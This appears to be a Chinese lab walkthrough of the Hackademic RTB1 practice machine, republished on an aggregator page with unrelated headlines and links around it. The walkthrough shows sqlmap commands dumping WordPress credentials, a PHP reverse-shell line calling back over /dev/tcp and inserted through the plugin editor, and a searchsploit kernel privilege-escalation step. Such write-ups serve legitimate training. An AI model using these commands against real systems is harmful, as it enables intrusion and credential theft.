当前位置: 首页 > news >正文

做网站营业执照经营范围怎么填写网站音频播放器代码

news 2025/11/7 11:16:26
做网站营业执照经营范围怎么填写,网站音频播放器代码,佛山高明网站建设设计,校园网页设计代码系列:Hackademic(此系列共2台) 难度:初级 信息收集 主机发现 netdiscover -r 192.168.80.0/24端口扫描 nmap -A -p- 192.168.80.143访问80端口 使用指纹识别插件查看是WordPress 根据首页显示的内容,点击target 点击…

系列:Hackademic(此系列共2台)
难度:初级

信息收集

主机发现

netdiscover -r 192.168.80.0/24

image-20230819150242058

端口扫描

nmap -A -p- 192.168.80.143

image-20230819151707785

访问80端口

image-20230819151453856

使用指纹识别插件查看是WordPress

image-20230819151946799

根据首页显示的内容,点击target

image-20230819152040904

image-20230819152140328

点击 页面能点击的链接,发现点击Uncategorized的时候,链接变成了

http://192.168.80.143/Hackademic_RTB1/?cat=1

image-20230819152319809

尝试有无SQL注入,在?cat=1后加上',发现有SQL语句的报错信息,可以判断有SQL注入漏洞

image-20230819152424365

目录扫描

单纯的爆破IP地址,扫描不出有用的目录信息

dirsearch -u http://192.168.80.143 -i 200

image-20230819164419748

开始是直接扫了IP,现在多了一个目录/Hackademic_RTB1/,那么直接扫该目录

dirsearch -u http://192.168.80.143/Hackademic_RTB1/ -i 200

image-20230819164354082

漏洞利用

sqlmap

查看都有哪些数据库

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" --dbs --batch

image-20230819152623542

获取所有表

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" -D wordpress --tables --batch

image-20230819152737643

获取该表的所有字段

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users  --columns --batch

image-20230819152939501

获取想要的数据

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users  -C user_login,user_pass --dump

image-20230819153048717

登录后台192.168.80.143/Hackademic_RTB1/wp-admin/

image-20230819164537854

使用一个用户密码登录 NickJames密码:admin

image-20230819165028767

登上 之后没有什么能够 利用的,尝试换一个用户登录看看

用户:GeorgeMiller密码q1w2e3,发现在Plugins选项里有一个Plugin Editor编辑的地址,加入反弹shell

system("bash -c 'sh -i &>/dev/tcp/192.168.80.132/8989 0>&1'");

image-20230819184510299

kali开启监听

nc -lvvp 8989

提交之后就得要知道上文的 路径,找出路径才能触发反弹shell

找到提交路径方式一:

wordpress上传的文件默认是存储在目录/wp-content/uploads中,Uploads文件夹中包括所有你上传的图片,视频和附件。

WordPress文件夹内,你会发现大量的代码文件和3个文件夹**wp-admin wp-content wp-includes**

wp-admin 没错,这是你的仪表板你登陆wordpress后看到的界面,包括所有的后台文件

wp-content包含你所有的内容,包括插件 , 主题和您上传的内容

Plugins文件夹包含所有插件。 每个插件都有一个自己的文件夹。 如Aksimet坐在Akismet在文件夹内

同样,theme主题文件夹保存你所有的主题。 插件一样,每个主题有单独的文件夹。

Uploads文件夹,所有你上传图片,视频和附件。

languages是关于语言的

wp-includes包括持有的所有文件和库,是必要的WordPress管理,编辑和JavaScript库,CSS和图像fiels

在爆破目录的时候发现有一个wp-content目录,可以访问一下看看

image-20230819171036292

页面显示如下

http://192.168.80.143/Hackademic_RTB1/wp-content/

image-20230819171102568

刚在又是在Plugins选项里的Plugin Editor编辑的反弹shell,刚在Plugin Editor编辑页面也显示了说正在编辑hello.php

image-20230819184413751

所以在http://192.168.80.143/Hackademic_RTB1/wp-content/页面中点击plugins

image-20230819171841864

image-20230819171903184

就看到了hello.php,点击hello.php触发反弹shell (耐心等待-----------------)

image-20230819172020273

内核提权

查看内核版本

uname -a

image-20230819180019128

新开一个终端搜索该版本的漏洞

searchsploit 2.6.3 | grep "Local Privilege Escalation"

image-20230819180245056

查看完整路径

searchsploit -p linux/local/15285.c

image-20230819180544957

把这个15285.c复制到apache服务的根路径/var/www/html

sudo cp  /usr/share/exploitdb/exploits/linux/local/15285.c  /var/www/html/15285.c

启动apache服务

systemctl restart apache2.service

image-20230819184303398

gcc 15285.c -o exp# 将15285.c预处理、汇编、编译并链接形成可执行文件exp#-o选项用来指定输出文件的文件名

15285.c预处理、汇编、编译并链接形成可执行文件exp

-o选项用来指定输出文件的文件名

image-20230819185040509

在这里插入图片描述

闯关成功!!!

http://www.yayakq.cn/news/451328/

相关文章:

  • 网站建设与维护模拟一企业网站建设需要的资料
  • 长春网站seo开发一套app要多少钱
  • 网站建设与实现毕业答辩ppt有名的app开发公司
  • 网站找建站公司易优cms插件
  • 网站开发搜索功能怎么实现已经有了网站源代码怎样搭建
  • 分销商城源码seo费用
  • 郑州优化网站公司营销型网站建立
  • 吉林企业网站模板建站哪个好微信分享接口网站开发
  • php+mysql网站开发全程实例 于荷云 pdf城乡建设和住房建设部八大员
  • 为了 门户网站建设wordpress产品列表
  • 网站建设费用主要包括那几项企业网站推广哪些效果比较好
  • 制作外贸网站广告设计找工作
  • 网站建设需要注意什么 知乎河南网站制作团队
  • 做网站可以参考的网站wordpress 接入小程序
  • 网站维护提醒php文件上海工业设计公司排名前十强
  • 舟山网站建设seo网络舆情监测处置制度
  • 死链接对网站的影响工信部域名查询
  • php制作网站后台网络推广公司哪家好
  • 定制网站建设服务平台网站开发公司 商业计划书
  • 设计网站页面出现问题模板下载器
  • 暴雪vpseo范畴有哪些
  • 毕设做网站些什么比较简单电商线上推广渠道
  • 自己做发卡网站长电商发展趋势和未来
  • 网站自定义title谁有国外hs网站
  • 软件站徐州优化网站建设
  • 镜子厂家东莞网站建设网站开发类合同范本
  • wordpress php 模板潍坊哪个网站公司做优化好
  • 医院做网站需要多少钱汕头老城区是什么区
  • 东莞企业网站开发上海网站编辑招聘
  • 成都学生做网站2021小学生新闻摘抄